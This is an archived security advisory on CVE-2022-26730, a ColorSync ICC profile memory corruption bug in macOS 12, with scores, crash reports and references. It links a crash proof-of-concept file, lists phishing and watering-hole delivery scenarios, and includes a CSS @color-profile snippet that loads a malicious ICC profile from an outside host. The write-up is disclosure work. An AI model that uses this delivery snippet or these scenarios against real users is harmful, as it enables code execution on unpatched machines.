CVE-2022-26730 _ ColorSync
🩸

CVE-2022-26730 _ ColorSync

📅 [ Archival Date ]
Nov 7, 2022 5:47 PM
⚠️ [ ORIGIN SOURCE ]
🏷️ [ Tags ]
CVE-2022-26730MacOS
✍️ [ Author ]

srd.cx / Hoyt LLC

💣 [ PoC / Exploit ]
image

Executive Summary

A memory corruption issue existed in the processing of ICC profiles. This issue was addressed with improved input validation. This issue is fixed in macOS Ventura 13. Processing a maliciously crafted image may lead to arbitrary code execution.

Patch Available for: Mac Studio (2022), Mac Pro (2019 and later), MacBook Air (2018 and later), MacBook Pro (2017 and later), Mac mini (2018 and later), iMac (2017 and later), MacBook (2017), and iMac Pro (2017).

A memory corruption issue existed in the processing of ICC profiles

https://support.apple.com/en-us/HT213488

NIST CVSS 3.x Severity and Metrics: 7.8 HIGH

Prior Art

Google Project Zero identified an out-of-bounds reads due to integer overflows in curve table initialization issue detailed in P0-2226 as CVE-2021-30942.

The issue described in this report was found in the CMMLutTag::InitializeCurveTable method, as called by CMMLutTag::CMMLutTag during the initialization of A2B0/B2A0 tags of type mAB/mBA. The curve table consists of a number of curves of type ‘para’ (parametricCurveType) or ‘curv’ (curveType). The latter is represented in the color profile with the following structures (copied from https://www.color.org/icProfileHeader.h):

https://bugs.chromium.org/p/project-zero/issues/detail?id=2226

CVE-2022-26730

👉
Overview Found via PoC Replay of P0-2226 and disassembly of Patch for CVE-2021-30942
  • Keywords: ICC Color Profile, User Controllable Input, Input Validation, Mac, PoC
  • Operating System: macOS 12
  • Vendor Notification: March 2022
  • Vendor Resolution: October 2022
  • Vendor Fix: This issue was addressed with improved input validation by Apple
  • Published: 10/31/2022
  • (Data Abort) byte read Translation fault
  • Bug Type == Incomplete Fix

CVE-2022-26730 curveType

image

CVE-2022-26730 Description: A memory corruption issue existed in the processing of ICC profiles of macOS 12 Keywords: ICC Color Profile, User Controllable Input, Input Validation, Mac, PoC

As Google wrote “curveType is represented in the color profile as defined in https://www.color.org/icProfileHeader.h” such as ToA0Tag, AToB0Tag, A2B2, A2B1 and other Tags and Sizes which are easy to Fuzz programmatically.

ColorSync ICC Profile

Graphical View of a PoC ICC Color Profile for CVE-2022-26730 detailing the curveParameters using Colorsync:

image

The issue described in this Report for CVE-2022-26730 was found in the Tag ‘cprt’ and Data ‘mluc’ of the Multi-localized Strings Code. The Elements are Sources of User Controllable Input [UCI].

A Tainted Source of UCI flowed into a Sink demonstrating CVE-2022-26730 was a memory corruption issue that existed in the processing of ICC profiles and that processing a maliciously crafted image may lead to arbitrary code execution.

Functional PoC’s for CVE-2022-26730 may be released at a future point in time due to the lack of protection for consumers not using macOS 13 and the availability of Prior Art to begin Exploit Development.

The Public Domain PoC Released today is a hand rolled ICC to Crash ColorSync [macOS 12] on a Null Byte Read at PoC URL https://xss.cx/2022/11/05/icc/Crash-CoreFoundation-CFDataGetLength-ColorSync-Crash-PoC-hand-crafted-to-hit-null-page-0x00-public-domain.icc.zip

CVE-2022-26730 Targets

  • (1) ColorSync, Safari, Finder, Instruments and other Applications consuming ICC Profiles or Graphics Files with embedded ICC Profile on macOS 12
  • (2) Apple Developer Instruments programs had additional memory corruption issues addressed in macOS 13 as a Result of CVE-2022-2630

CVE-2022-26730 PNG Fuzzing Exploit Container

CVE-2022-26730 PNG Fuzzing Container PoC

CVE-2022-26730 Attack Styles

WateringHoleSpearPhishingEmailBombCross Site Scripting, Other

CVE-2022-26730 Use Case

Case #1: Attacker hand rolls an ICC Color Profile named bad.icc then Embedded in good.png and Campaigned

Case #2 Attacker crafts HTML File with Reference to the Malicious ICC or Graphics Picture and Campaigned

CVE-2022-26730 HTML Exploit Delivery Container

PoC Download

@media color-gamut: p2{
  @color-profile{ name: p3; src: url(hxxps://xss.cx/..path.part../icc/cve-2022-26730-arbitrary-code-execution-user-controllable-input-poc-1.icc); }

Reporter CVSS v3.1 Vector Pro Forma for HTML Exploit Delivery: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C/CR:H/IR:H/AR:H/MAV:N/MAC:H/MPR:N/MUI:R/MS:C/MC:H/MI:H/MA:H

  • CVSS 3.1 Base Score: 8.8
  • Impact Subscore: 5.9
  • Exploitability Subscore: 2.8
  • CVSS Temporal Score: 8.4
  • CVSS Environmental Score: 8.0
  • Modified Impact Subscore: 6.1
  • Overall CVSS 3.1 Score: 8.0

Crash Reports

CVE-2022-26730 | X86_64 SIGBUS Crash leaks ColorSync | macOS 12

CVE-2022-26730 | X86_64 SIGBUS Crash leaks ColorSync | macOS 12

CVE-2022-26730 | X86_64 SIGBUS Crash malloc_history ColorSync | macOS 12

Knowledgebase

https://bugs.chromium.org/p/project-zero/issues/detail?id=2226

Issue 2226: Apple ColorSync: out-of-bounds reads due to integer overflows in curve table initialization

https://bugs.chromium.org/p/project-zero/issues/detail?id=2225

Issue 2225: Apple ColorSync: use of uninitialized memory in CMMNDimLinear::Interpolate

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26730

https://nvd.nist.gov/vuln/detail/CVE-2022-26730